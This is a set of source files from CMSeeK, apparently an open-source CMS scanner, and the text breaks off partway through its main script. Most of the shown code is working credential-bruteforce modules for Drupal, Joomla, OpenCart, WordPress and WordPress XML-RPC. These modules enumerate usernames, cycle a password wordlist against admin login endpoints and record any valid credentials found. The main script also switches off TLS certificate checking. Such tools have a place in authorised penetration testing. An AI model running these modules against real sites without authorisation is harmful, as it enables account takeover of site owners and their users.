26 | regex = re.findall(r'<!-- YaBB (\d.*?) ', source) | |
27 | if regex != []: | |
28 | if regex[0] != '' and regex[0] != ' ': | |
29 | version = regex[0] | |
30 | cmseek.success('YaBB version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
31 | return version | |
32 | ||
33 | cmseek.error('Version detection failed!') | |
34 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # YAF version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(source): | |
12 | regex = re.findall(r'Powered by YAF.NET (\d.*?)</a>', source) | |
13 | if regex != []: | |
14 | if regex[0] != '' and regex[0] != ' ': | |
15 | version = regex[0].replace(' ', '') | |
16 | cmseek.success('YAF version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | ||
19 | cmseek.error('Version detection failed!') | |
20 | return '0' |
0 | __all__ = ['wp','oc','joom','dru'] |
0 | {"dru": "Drupal", "joom": "Joomla", "oc": "OpenCart", "wp": "WordPress", "wpxmlrpc": "WordPress XML-RPC"}⏎ |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ### Drupal Bruteforce module | |
5 | ### Version 1.0 | |
6 | ### Honestly this is kinda useless as drupal blocks an account for some time after 5 failed attempt (maybe this is one fix in the next version!) | |
7 | ### cmseekbruteforcemodule <- make sure you include this comment in any custom modules you create so that cmseek can recognize it as a part of it's module | |
8 | ||
9 | ||
10 | import cmseekdb.basic as cmseek # I don't feel like commenting | |
11 | import cmseekdb.sc as source # Contains function to detect cms from source code | |
12 | import cmseekdb.header as header # Contains function to detect CMS from gathered http headers | |
13 | import multiprocessing ## Let's speed things up a lil bit (actually a hell lot faster) shell we? | |
14 | from functools import partial ## needed somewhere :/ | |
15 | import sys | |
16 | import requests | |
17 | import re | |
18 | import cmseekdb.generator as generator | |
19 | ||
20 | ||
21 | def testlogin(url,user,passw,formid): | |
22 | ||
23 | if url.endswith('/'): | |
24 | loginUrl = url + 'user/login/' | |
25 | redirect = url + 'user/1/' | |
26 | else: | |
27 | loginUrl = url + '/user/login/' | |
28 | redirect = url + '/user/1/' | |
29 | ||
30 | post = { 'name': user, 'pass': passw, 'form_id': formid, 'op': 'Log in', 'location': redirect } | |
31 | session = requests.Session() | |
32 | response = session.post(loginUrl, data=post) | |
33 | return response.url | |
34 | ||
35 | def start(): | |
36 | cmseek.clearscreen() | |
37 | cmseek.banner("Drupal Bruteforce Module") | |
38 | url = cmseek.targetinp("") # input('Enter Url: ') | |
39 | cmseek.info("Checking for Drupal") | |
40 | bsrc = cmseek.getsource(url, cmseek.randomua('onceuponatime')) | |
41 | if bsrc[0] != '1': | |
42 | cmseek.error("Could not get target source, CMSeek is quitting") | |
43 | cmseek.handle_quit() | |
44 | else: | |
45 | ## Parse generator meta tag | |
46 | parse_generator = generator.parse(bsrc[1]) | |
47 | ga = parse_generator[0] | |
48 | ga_content = parse_generator[1] | |
49 | ||
50 | try1 = generator.scan(ga_content) | |
51 | if try1[0] == '1' and try1[1] == 'dru': | |
52 | drucnf = '1' | |
53 | else: | |
54 | try2 = source.check(bsrc[1], url) # Confirming Drupal using other source code checks | |
55 | if try2[0] == '1' and try2[1] == 'dru': | |
56 | drucnf = '1' | |
57 | else: | |
58 | try3 = header.check(bsrc[2]) # Headers Check! | |
59 | if try3[0] == '1' and try3[1] == 'dru': | |
60 | drucnf = '1' | |
61 | else: | |
62 | drucnf = '0' | |
63 | if drucnf != '1': | |
64 | cmseek.error('Could not confirm Drupal... CMSeek is quitting') | |
65 | cmseek.handle_quit() | |
66 | else: | |
67 | cmseek.success("Drupal Confirmed... Checking for Drupal login form") | |
68 | druloginsrc = cmseek.getsource(url + '/user/login/', cmseek.randomua('therelivedaguynamedkakashi')) | |
69 | if druloginsrc[0] == '1' and '<form' in druloginsrc[1] and 'name="form_id" value="' in druloginsrc[1]: | |
70 | cmseek.success("Login form found! Retriving form id value") | |
71 | fid = re.findall(r'name="form_id" value="(.*?)"', druloginsrc[1]) | |
72 | if fid == []: | |
73 | cmseek.error("Could not find form_id, CMSeeK is quitting!") | |
74 | cmseek.handle_quit() | |
75 | else: | |
76 | cmseek.success('form_id found: ' + cmseek.bold + fid[0] + cmseek.cln) | |
77 | form_id = fid[0] | |
78 | druparamuser = [''] | |
79 | rawuser = input("[~] Enter Usernames with coma as separation without any space (example: cris,harry): ").split(',') | |
80 | for rusr in rawuser: | |
81 | druparamuser.append(rusr) | |
82 | drubruteusers = set(druparamuser) ## Strip duplicate usernames | |
83 | ||
84 | for user in drubruteusers: | |
85 | if user != '': | |
86 | print('\n') | |
87 | cmseek.info("Bruteforcing User: " + cmseek.bold + user + cmseek.cln) | |
88 | pwd_file = open("wordlist/passwords.txt", "r") | |
89 | passwords = pwd_file.read().split('\n') | |
90 | passwords.insert(0, user) | |
91 | passfound = '0' | |
92 | for password in passwords: | |
93 | if password != '' and password != '\n': | |
94 | sys.stdout.write('[*] Testing Password: ') | |
95 | sys.stdout.write('%s\r\r' % password) | |
96 | sys.stdout.flush() | |
97 | cursrc = testlogin(url, user, password, form_id) | |
98 | # print(cursrc) | |
99 | if '/user/login/' in str(cursrc): | |
100 | continue | |
101 | else: | |
102 | cmseek.success('Password found! \n\n\n') | |
103 | # print (cursrc) | |
104 | cmseek.success('Password found!') | |
105 | print(" |\n |--[username]--> " + cmseek.bold + user + cmseek.cln + "\n |\n |--[password]--> " + cmseek.bold + password + cmseek.cln + "\n |") | |
106 | cmseek.success('Enjoy The Hunt!') | |
107 | cmseek.savebrute(url,url + '/user/login',user,password) | |
108 | passfound = '1' | |
109 | break | |
110 | break | |
111 | if passfound == '0': | |
112 | cmseek.error('\n\nCould Not find Password!') | |
113 | print('\n\n') | |
114 | ||
115 | else: | |
116 | cmseek.error("Couldn't find login form... CMSeeK is quitting") | |
117 | cmseek.handle_quit() |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ### Joomla Bruteforce module | |
5 | ### Version 1.3 | |
6 | ### This thing took a whole freaking night to build... apperently i was dealing with the cookies in a not so "Wise" manner! | |
7 | ### cmseekbruteforcemodule <- make sure you include this comment in any custom modules you create so that cmseek can recognize it as a part of it's module | |
8 | ||
9 | import cmseekdb.basic as cmseek | |
10 | import cmseekdb.sc as source # Contains function to detect cms from source code | |
11 | import cmseekdb.header as header # Contains function to detect CMS from gathered http headers | |
12 | import cmseekdb.generator as generator | |
13 | import multiprocessing ## Let's speed things up a lil bit (actually a hell lot faster) shell we? | |
14 | from functools import partial ## needed somewhere :/ | |
15 | import sys | |
16 | import cmseekdb.generator as generator | |
17 | import re | |
18 | import urllib.request, urllib.error, urllib.parse | |
19 | import http.cookiejar | |
20 | from html.parser import HTMLParser | |
21 | ||
22 | class extInpTags(HTMLParser): | |
23 | ||
24 | def __init__(self): | |
25 | HTMLParser.__init__(self) | |
26 | self.return_array = {} | |
27 | ||
28 | def handle_starttag(self, tag, attrs): | |
29 | if tag == "input": | |
30 | name = None | |
31 | value = None | |
32 | for nm,val in attrs: | |
33 | if nm == "name": | |
34 | name = val | |
35 | if nm == "value": | |
36 | value = val | |
37 | if name is not None and value is not None: | |
38 | self.return_array.update({name:value}) | |
39 | ||
40 | ||
41 | def testlogin(url,user,passw): | |
42 | url = url + '/administrator/index.php' | |
43 | cj = http.cookiejar.FileCookieJar("cookieszz") | |
44 | opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) | |
45 | joomloginsrc = opener.open(url).read().decode() | |
46 | parser = extInpTags() | |
47 | post_array = parser.feed(joomloginsrc) | |
48 | main_param = {'username':user, 'passwd':passw} | |
49 | other_param = parser.return_array | |
50 | post_data = main_param.copy() | |
51 | post_data.update(other_param) | |
52 | post_datad = urllib.parse.urlencode(post_data).encode("utf-8") | |
53 | ua = cmseek.randomua('generatenewuaeverytimetobesafeiguess') | |
54 | try: | |
55 | with opener.open(url, post_datad) as response: | |
56 | scode = response.read().decode() | |
57 | headers = str(response.info()) | |
58 | rurl = response.geturl() | |
59 | r = ['1', scode, headers, rurl] ## 'success code', 'source code', 'http headers', 'redirect url' | |
60 | return r | |
61 | except Exception as e: | |
62 | e = str(e) | |
63 | r = ['2', e, '', ''] ## 'error code', 'error message', 'empty' | |
64 | return r | |
65 | print('hola') | |
66 | ||
67 | ||
68 | def start(): | |
69 | cmseek.clearscreen() | |
70 | cmseek.banner("Joomla Bruteforce Module") | |
71 | url = cmseek.targetinp("") # input('Enter Url: ') | |
72 | cmseek.info("Checking for Joomla") | |
73 | bsrc = cmseek.getsource(url, cmseek.randomua('foodislove')) | |
74 | joomcnf = '0' | |
75 | if bsrc[0] != '1': | |
76 | cmseek.error("Could not get target source, CMSeek is quitting") | |
77 | cmseek.handle_quit() | |
78 | else: | |
79 | ## Parse generator meta tag | |
80 | parse_generator = generator.parse(bsrc[1]) | |
81 | ga = parse_generator[0] | |
82 | ga_content = parse_generator[1] | |
83 | ||
84 | try1 = generator.scan(ga_content) | |
85 | if try1[0] == '1' and try1[1] == 'joom': | |
86 | joomcnf = '1' | |
87 | else: | |
88 | try2 = source.check(bsrc[1], url) | |
89 | if try2[0] == '1' and try2[1] == 'joom': | |
90 | joomcnf = '1' | |
91 | else: | |
92 | try3 = header.check(bsrc[2]) # Headers Check! | |
93 | if try3[0] == '1' and try3[1] == 'joom': | |
94 | joomcnf = '1' | |
95 | else: | |
96 | joomcnf = '0' | |
97 | if joomcnf != '1': | |
98 | cmseek.error('Could not confirm Joomla... CMSeek is quitting') | |
99 | cmseek.handle_quit() | |
100 | else: | |
101 | cmseek.success("Joomla Confirmed... Confirming form and getting token...") | |
102 | joomloginsrc = cmseek.getsource(url + '/administrator/index.php', cmseek.randomua('thatsprettygay')) | |
103 | if joomloginsrc[0] == '1' and '<form' in joomloginsrc[1]: | |
104 | # joomtoken = re.findall(r'type=\"hidden\" name=\"(.*?)\" value=\"1\"', joomloginsrc[1]) | |
105 | # if len(joomtoken) == 0: | |
106 | # cmseek.error('Unable to get token... CMSeek is quitting!') | |
107 | # cmseek.handle_quit() | |
108 | # cmseek.success("Token grabbed successfully: " + cmseek.bold + joomtoken[0] + cmseek.cln) | |
109 | # token = joomtoken[0] | |
110 | joomparamuser = [] | |
111 | rawuser = input("[~] Enter Usernames with coma as separation without any space (example: cris,harry): ").split(',') | |
112 | for rusr in rawuser: | |
113 | joomparamuser.append(rusr) | |
114 | joombruteusers = set(joomparamuser) ## Strip duplicate usernames in case any smartass didn't read the full thing and entered admin as well | |
115 | for user in joombruteusers: | |
116 | passfound = '0' | |
117 | print('\n') | |
118 | cmseek.info("Bruteforcing User: " + cmseek.bold + user + cmseek.cln) | |
119 | pwd_file = open("wordlist/passwords.txt", "r") | |
120 | passwords = pwd_file.read().split('\n') | |
121 | passwords.insert(0, user) | |
122 | for password in passwords: | |
123 | if password != '' and password != '\n': | |
124 | sys.stdout.write('[*] Testing Password: ') | |
125 | sys.stdout.write('%s\r\r' % password) | |
126 | sys.stdout.flush() | |
127 | # print("Testing Pass: " + password) | |
128 | cursrc = testlogin(url, user, password) | |
129 | # print('Token: ' + token) | |
130 | # print("Ret URL: " + str(cursrc[3])) | |
131 | if 'logout' in str(cursrc[1]): | |
132 | print('\n') | |
133 | cmseek.success('Password found!') | |
134 | print(" |\n |--[username]--> " + cmseek.bold + user + cmseek.cln + "\n |\n |--[password]--> " + cmseek.bold + password + cmseek.cln + "\n |") | |
135 | cmseek.success('Enjoy The Hunt!') | |
136 | cmseek.savebrute(url,url + '/administrator/index.php',user,password) | |
137 | passfound = '1' | |
138 | break | |
139 | else: | |
140 | continue | |
141 | break | |
142 | if passfound == '0': | |
143 | cmseek.error('\n\nCould Not find Password!') | |
144 | print('\n\n') | |
145 | ||
146 | else: | |
147 | cmseek.error("Couldn't find login form... CMSeeK is quitting") | |
148 | cmseek.handle_quit() |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ### OpenCart Bruteforce module | |
5 | ### Version 1.0 | |
6 | ### cmseekbruteforcemodule <- make sure you include this comment in any custom modules you create so that cmseek can recognize it as a part of it's module | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import cmseekdb.sc as source # Contains function to detect cms from source code | |
10 | import cmseekdb.header as header # Contains function to detect CMS from gathered http headers | |
11 | import multiprocessing ## Let's speed things up a lil bit (actually a hell lot faster) shell we? | |
12 | from functools import partial ## needed somewhere :/ | |
13 | import sys | |
14 | import cmseekdb.generator as generator | |
15 | import urllib.request | |
16 | ||
17 | ||
18 | def testlogin(url,user,passw,): | |
19 | url = url + '/admin/index.php' | |
20 | ua = cmseek.randomua('generatenewuaeverytimetobesafeiguess') | |
21 | try: | |
22 | ckreq = urllib.request.Request( | |
23 | url, | |
24 | data=urllib.parse.urlencode({'username':user, 'password':passw}).encode("utf-8"), | |
25 | headers={ | |
26 | 'User-Agent': ua | |
27 | } | |
28 | ) | |
29 | with urllib.request.urlopen(ckreq, timeout=4) as response: | |
30 | scode = response.read().decode() | |
31 | headers = str(response.info()) | |
32 | rurl = response.geturl() | |
33 | r = ['1', scode, headers, rurl] ## 'success code', 'source code', 'http headers' | |
34 | return r | |
35 | except Exception as e: | |
36 | e = str(e) | |
37 | r = ['2', e, '', ''] ## 'error code', 'error message', 'empty' | |
38 | return r | |
39 | print('hola') | |
40 | ||
41 | ||
42 | def start(): | |
43 | cmseek.clearscreen() | |
44 | cmseek.banner("OpenCart Bruteforce Module") | |
45 | url = cmseek.targetinp("") # input('Enter Url: ') | |
46 | cmseek.info("Checking for OpenCart") | |
47 | bsrc = cmseek.getsource(url, cmseek.randomua('foodislove')) | |
48 | if bsrc[0] != '1': | |
49 | cmseek.error("Could not get target source, CMSeek is quitting") | |
50 | cmseek.handle_quit() | |
51 | else: | |
52 | ## Parse generator meta tag | |
53 | parse_generator = generator.parse(bsrc[1]) | |
54 | ga = parse_generator[0] | |
55 | ga_content = parse_generator[1] | |
56 | ||
57 | try1 = generator.scan(ga_content) | |
58 | if try1[0] == '1' and try1[1] == 'oc': | |
59 | occnf = '1' | |
60 | else: | |
61 | try2 = source.check(bsrc[1], url) | |
62 | if try2[0] == '1' and try2[1] == 'oc': | |
63 | occnf = '1' | |
64 | else: | |
65 | occnf = '0' | |
66 | if occnf != '1': | |
67 | cmseek.error('Could not confirm OpenCart... CMSeek is quitting') | |
68 | cmseek.handle_quit() | |
69 | else: | |
70 | cmseek.success("OpenCart Confirmed... Checking for OpenCart login form") | |
71 | ocloginsrc = cmseek.getsource(url + '/admin/index.php', cmseek.randomua('thatsprettygay')) | |
72 | if ocloginsrc[0] == '1' and '<form' in ocloginsrc[1] and 'route=common/login' in ocloginsrc[1]: | |
73 | cmseek.success("Login form found!") | |
74 | ocparamuser = [''] | |
75 | rawuser = input("[~] Enter Usernames with coma as separation without any space (example: cris,harry): ").split(',') | |
76 | for rusr in rawuser: | |
77 | ocparamuser.append(rusr) | |
78 | ocbruteusers = set(ocparamuser) ## Strip duplicate usernames | |
79 | ||
80 | for user in ocbruteusers: | |
81 | if user != '': | |
82 | passfound = '0' | |
83 | print('\n') | |
84 | cmseek.info("Bruteforcing User: " + cmseek.bold + user + cmseek.cln) | |
85 | pwd_file = open("wordlist/passwords.txt", "r") | |
86 | passwords = pwd_file.read().split('\n') | |
87 | passwords.insert(0, user) | |
88 | for password in passwords: | |
89 | if password != '' and password != '\n': | |
90 | sys.stdout.write('[*] Testing Password: ') | |
91 | sys.stdout.write('%s\r\r' % password) | |
92 | sys.stdout.flush() | |
93 | cursrc = testlogin(url, user, password) | |
94 | if 'route=common/dashboard&user_token=' in str(cursrc[3]): | |
95 | cmseek.success('Password found!') | |
96 | print(" |\n |--[username]--> " + cmseek.bold + user + cmseek.cln + "\n |\n |--[password]--> " + cmseek.bold + password + cmseek.cln + "\n |") | |
97 | cmseek.success('Enjoy The Hunt!') | |
98 | cmseek.savebrute(url,url + '/admin/index.php',user,password) | |
99 | passfound = '1' | |
100 | break | |
101 | else: | |
102 | continue | |
103 | break | |
104 | if passfound == '0': | |
105 | cmseek.error('\n\nCould Not find Password!') | |
106 | print('\n\n') | |
107 | ||
108 | else: | |
109 | cmseek.error("Couldn't find login form... CMSeeK is quitting") | |
110 | cmseek.handle_quit() |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ### WordPress Bruteforce module | |
5 | ### Version 1.0 | |
6 | ### cmseekbruteforcemodule <- make sure you include this comment in any custom modules you create so that cmseek can recognize it as a part of it's module | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import cmseekdb.sc as source # Contains function to detect cms from source code | |
10 | import cmseekdb.header as header # Contains function to detect CMS from gathered http headers | |
11 | import deepscans.wp.userenum as wp_user_enum | |
12 | import multiprocessing ## Let's speed things up a lil bit (actually a hell lot faster) shell we? | |
13 | from functools import partial ## needed somewhere :/ | |
14 | import sys | |
15 | import cmseekdb.generator as generator | |
16 | ||
17 | def start(): | |
18 | cmseek.clearscreen() | |
19 | cmseek.banner("WordPress Bruteforce Module") | |
20 | url = cmseek.targetinp("") # input('Enter Url: ') | |
21 | cmseek.info("Checking for WordPress") | |
22 | bsrc = cmseek.getsource(url, cmseek.randomua('thiscanbeanythingasfarasnowletitbewhatilovethemost')) | |
23 | if bsrc[0] != '1': | |
24 | # print(bsrc[1]) | |
25 | cmseek.error("Could not get target source, CMSeek is quitting") | |
26 | cmseek.handle_quit() | |
27 | else: | |
28 | ## Parse generator meta tag | |
29 | parse_generator = generator.parse(bsrc[1]) | |
30 | ga = parse_generator[0] | |
31 | ga_content = parse_generator[1] | |
32 | ||
33 | try1 = generator.scan(ga_content) | |
34 | if try1[0] == '1' and try1[1] == 'wp': | |
35 | wpcnf = '1' | |
36 | else: | |
37 | try2 = source.check(bsrc[1], url) | |
38 | if try2[0] == '1' and try2[1] == 'wp': | |
39 | wpcnf = '1' | |
40 | else: | |
41 | wpcnf = '0' | |
42 | if wpcnf != '1': | |
43 | print(bsrc[1]) | |
44 | cmseek.error('Could not confirm WordPress... CMSeek is quitting') | |
45 | cmseek.handle_quit() | |
46 | else: | |
47 | cmseek.success("WordPress Confirmed... Checking for WordPress login form") | |
48 | wploginsrc = cmseek.getsource(url + '/wp-login.php', cmseek.randomua('thatsprettygay')) | |
49 | if wploginsrc[0] == '1' and '<form' in wploginsrc[1]: | |
50 | cmseek.success("Login form found.. Detecting Username For Bruteforce") | |
51 | wpparamuser = [] | |
52 | uenum = wp_user_enum.start('wp', url, cmseek.randomua('r'), '0', bsrc[1]) | |
53 | usernamesgen = uenum[0] | |
54 | wpparamuser = uenum[1] | |
55 | ||
56 | if wpparamuser == []: | |
57 | customuser = input("[~] CMSeek could not enumerate usernames, enter username if you know any: ") | |
58 | if customuser == "": | |
59 | cmseek.error("No user found, CMSeek is quitting") | |
60 | else: | |
61 | wpparamuser.append(customuser) | |
62 | wpbruteusers = set(wpparamuser) | |
63 | ||
64 | for user in wpbruteusers: | |
65 | passfound = '0' | |
66 | print('\n') | |
67 | cmseek.info("Bruteforcing User: " + cmseek.bold + user + cmseek.cln) | |
68 | pwd_file = open("wordlist/passwords.txt", "r") | |
69 | passwords = pwd_file.read().split('\n') | |
70 | passwords.insert(0, user) | |
71 | for password in passwords: | |
72 | if password != '' and password != '\n': | |
73 | sys.stdout.write('[*] Testing Password: ') | |
74 | sys.stdout.write('%s\r\r' % password) | |
75 | sys.stdout.flush() | |
76 | cursrc = cmseek.wpbrutesrc(url, user, password) | |
77 | if 'wp-admin' in str(cursrc[3]): | |
78 | cmseek.success('Password found!') | |
79 | print(" |\n |--[username]--> " + cmseek.bold + user + cmseek.cln + "\n |\n |--[password]--> " + cmseek.bold + password + cmseek.cln + "\n |") | |
80 | cmseek.success('Enjoy The Hunt!') | |
81 | cmseek.savebrute(url,url + '/wp-login.php',user,password) | |
82 | passfound = '1' | |
83 | break | |
84 | else: | |
85 | continue | |
86 | break | |
87 | if passfound == '0': | |
88 | cmseek.error('\n\nCould Not find Password!') | |
89 | print('\n\n') | |
90 | ||
91 | else: | |
92 | cmseek.error("Couldn't find login form... CMSeeK is quitting") | |
93 | # print(wploginsrc[1]) | |
94 | cmseek.handle_quit() |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ### WordPress XML-RPC Bruteforce module | |
5 | ### Version 1.0 | |
6 | ### cmseekbruteforcemodule <- make sure you include this comment in any custom modules you create so that cmseek can recognize it as a part of it's module | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import cmseekdb.sc as source # Contains function to detect cms from source code | |
10 | import cmseekdb.header as header # Contains function to detect CMS from gathered http headers | |
11 | import deepscans.wp.userenum as wp_user_enum | |
12 | import multiprocessing ## Let's speed things up a lil bit (actually a hell lot faster) shell we? | |
13 | from functools import partial ## needed somewhere :/ | |
14 | import sys | |
15 | import cmseekdb.generator as generator | |
16 | import requests | |
17 | ||
18 | def wpbrutexmlrpc(xmlrpcurl, user, password): | |
19 | postdata = '<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>{}</value></param><param><value>{}</value></param></params></methodCall>'.format(user, password) | |
20 | brute = requests.post(xmlrpcurl, data=postdata) | |
21 | try: | |
22 | if "isAdmin" in brute.text and "blogid" in brute.text: | |
23 | return True | |
24 | else: | |
25 | return False | |
26 | except: | |
27 | return False | |
28 | ||
29 | ||
30 | def start(): | |
31 | cmseek.clearscreen() | |
32 | cmseek.banner("WordPress XML-RPC Bruteforce Module") | |
33 | url = cmseek.targetinp("") # input('Enter Url: ') | |
34 | cmseek.info("Checking for WordPress") | |
35 | bsrc = cmseek.getsource(url, cmseek.randomua('thiscanbeanythingasfarasnowletitbewhatilovethemost')) | |
36 | if bsrc[0] != '1': | |
37 | # print(bsrc[1]) | |
38 | cmseek.error("Could not get target source, CMSeek is quitting") | |
39 | cmseek.handle_quit() | |
40 | else: | |
41 | ## Parse generator meta tag | |
42 | parse_generator = generator.parse(bsrc[1]) | |
43 | ga = parse_generator[0] | |
44 | ga_content = parse_generator[1] | |
45 | ||
46 | try1 = generator.scan(ga_content) | |
47 | if try1[0] == '1' and try1[1] == 'wp': | |
48 | wpcnf = '1' | |
49 | else: | |
50 | try2 = source.check(bsrc[1], url) | |
51 | if try2[0] == '1' and try2[1] == 'wp': | |
52 | wpcnf = '1' | |
53 | else: | |
54 | wpcnf = '0' | |
55 | if wpcnf != '1': | |
56 | print(bsrc[1]) | |
57 | cmseek.error('Could not confirm WordPress... CMSeek is quitting') | |
58 | cmseek.handle_quit() | |
59 | else: | |
60 | cmseek.success("WordPress Confirmed... validating xmlrpc interface") | |
61 | xmlrpcurl = url + '/xmlrpc.php' | |
62 | wploginsrc = cmseek.getsource(xmlrpcurl, cmseek.randomua('thatsprettygay')) | |
63 | if wploginsrc[1] == 'HTTP Error 405: Method Not Allowed': | |
64 | cmseek.success("Login form found.. Detecting Username For Bruteforce") | |
65 | wpparamuser = [] | |
66 | uenum = wp_user_enum.start('wp', url, cmseek.randomua('r'), '0', bsrc[1]) | |
67 | usernamesgen = uenum[0] | |
68 | wpparamuser = uenum[1] | |
69 | ||
70 | if wpparamuser == []: | |
71 | customuser = input("[~] CMSeek could not enumerate usernames, enter username if you know any: ") | |
72 | if customuser == "": | |
73 | cmseek.error("No user found, CMSeek is quitting") | |
74 | else: | |
75 | wpparamuser.append(customuser) | |
76 | wpbruteusers = set(wpparamuser) | |
77 | ||
78 | for user in wpbruteusers: | |
79 | passfound = '0' | |
80 | print('\n') | |
81 | cmseek.info("Bruteforcing User: " + cmseek.bold + user + cmseek.cln) | |
82 | pwd_file = open("wordlist/passwords.txt", "r") | |
83 | passwords = pwd_file.read().split('\n') | |
84 | passwords.insert(0, user) | |
85 | for password in passwords: | |
86 | if password != '' and password != '\n': | |
87 | sys.stdout.write('[*] Testing Password: ') | |
88 | sys.stdout.write('%s\r\r' % password) | |
89 | sys.stdout.flush() | |
90 | cursrc = wpbrutexmlrpc(xmlrpcurl, user, password) | |
91 | if cursrc: | |
92 | cmseek.success('Password found!') | |
93 | print(" |\n |--[username]--> " + cmseek.bold + user + cmseek.cln + "\n |\n |--[password]--> " + cmseek.bold + password + cmseek.cln + "\n |") | |
94 | cmseek.success('Enjoy The Hunt!') | |
95 | cmseek.savebrute(url,url + '/wp-login.php',user,password) | |
96 | passfound = '1' | |
97 | break | |
98 | else: | |
99 | continue | |
100 | break | |
101 | if passfound == '0': | |
102 | cmseek.error('\n\nCould Not find Password!') | |
103 | print('\n\n') | |
104 | ||
105 | else: | |
106 | cmseek.error("Couldn't find XML-RPC interface... CMSeeK is quitting") | |
107 | # print(wploginsrc[1]) | |
108 | cmseek.handle_quit() |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
3 | ||
4 | import sys | |
5 | ||
6 | ## for people who don't bother reading the readme :/ | |
7 | if sys.version_info[0] < 3: | |
8 | print("\nPython3 is needed to run CMSeeK, Try \"python3 cmseek.py\" instead\n") | |
9 | sys.exit(2) | |
10 | ||
11 | import os | |
12 | import argparse | |
13 | import json | |
14 | import importlib | |
15 | ||
16 | import cmseekdb.basic as cmseek # All the basic functions | |
17 | import cmseekdb.core as core | |
18 | import cmseekdb.createindex as createindex | |
19 | import ssl | |
20 | ssl._create_default_https_context = ssl._create_unverified_context | |
21 | ||
22 | parser = argparse.ArgumentParser(prog='cmseek.py',add_help=False) | |
23 | parser.add_argument('-h', '--help', action="store_true") | |
24 | parser.add_argument('-v', '--verbose', action="store_true") | |
25 | parser.add_argument("--version", action="store_true") | |
26 | parser.add_argument("--update", action="store_true") | |
27 | parser.add_argument('-r', "--random-agent", action="store_true") | |
28 | parser.add_argument('--user-agent') | |
29 | parser.add_argument('--googlebot', action="store_true") | |
30 | parser.add_argument('-u', '--url') | |
31 | parser.add_argument('-l', '--list') | |
32 | parser.add_argument('--clear-result', action='store_true') | |
33 | parser.add_argument('--follow-redirect', action='store_true') | |
34 | parser.add_argument('--no-redirect', action='store_true') | |
35 | parser.add_argument('--batch', action="store_true") | |
36 | parser.add_argument('-i', '--ignore-cms') | |
37 | parser.add_argument('--strict-cms') | |
38 | parser.add_argument('--skip-scanned', action="store_true") | |
39 | parser.add_argument('--light-scan', action="store_true") | |
40 | parser.add_argument('-o', '--only-cms', action="store_true") | |
41 | args = parser.parse_args() | |
42 | ||
43 | if args.clear_result: | |
44 | cmseek.clear_log() | |
45 | ||
46 | if args.help: | |
47 | cmseek.help() | |
48 | ||
49 | if args.light_scan: | |
50 | # Suggestion #99 | |
51 | cmseek.light_scan = True | |
52 | ||
53 | if args.only_cms: | |
54 | # Suggestion #99 | |
55 | cmseek.only_cms = True | |
56 | ||
57 | if args.verbose: | |
58 | cmseek.verbose = True | |
59 | ||
60 | if args.skip_scanned: | |
61 | cmseek.skip_scanned = True | |
62 | ||
63 | if args.follow_redirect: | |
64 | cmseek.redirect_conf = '1' | |
65 | ||
66 | if args.no_redirect: | |
67 | cmseek.redirect_conf = '2' | |
68 | ||
69 | if args.update: | |
70 | cmseek.update() | |
71 | ||
72 | if args.batch: | |
73 | #print('Batch true') | |
74 | cmseek.batch_mode = True | |
75 | print(cmseek.batch_mode) | |
76 | ||
77 | if args.version: | |
78 | print('\n\n') | |
79 | cmseek.info("CMSeeK Version: " + cmseek.cmseek_version) | |
80 | cmseek.bye() | |
81 | ||
82 | if args.ignore_cms: | |
83 | cmseek.ignore_cms = args.ignore_cms.split(',') | |
84 | for acms in cmseek.ignore_cms: | |
85 | cmseek.warning('Ignoring CMS: ' + acms) | |
86 | ||
87 | if args.strict_cms: | |
88 | cmseek.strict_cms = args.strict_cms.split(',') | |
89 | cmseek.warning('Checking target against CMSes: ' + args.strict_cms) | |
90 | ||
91 | if args.user_agent is not None: | |
92 | cua = args.user_agent | |
93 | elif args.random_agent is not None: | |
94 | cua = cmseek.randomua('random') | |
95 | else: | |
96 | cua = None | |
97 | ||
98 | if args.googlebot: | |
99 | cua = 'Googlebot/2.1 (+http://www.google.com/bot.html)' | |
100 | ||
101 | # Update report index | |
102 | index_status = createindex.init(cmseek.access_directory) | |
103 | if index_status[0] != '1': | |
104 | # might be too extreme | |
105 | # cmseek.handle_quit() | |
106 | if not cmseek.batch_mode: | |
107 | input('There was an error while creating result index! Some features might not work as intended. Press [ENTER] to continue:') | |
108 | ||
109 | if args.url is not None: | |
110 | s = args.url | |
111 | target = cmseek.process_url(s) | |
112 | if target != '0': | |
113 | if cua == None: | |
114 | cua = cmseek.randomua() | |
115 | core.main_proc(target,cua) | |
116 | cmseek.handle_quit() | |
117 | ||
118 | elif args.list is not None: | |
119 | sites = args.list | |
120 | cmseek.clearscreen() | |
121 | cmseek.banner("CMS Detection And Deep Scan") | |
122 | sites_list = [] | |
123 | try: | |
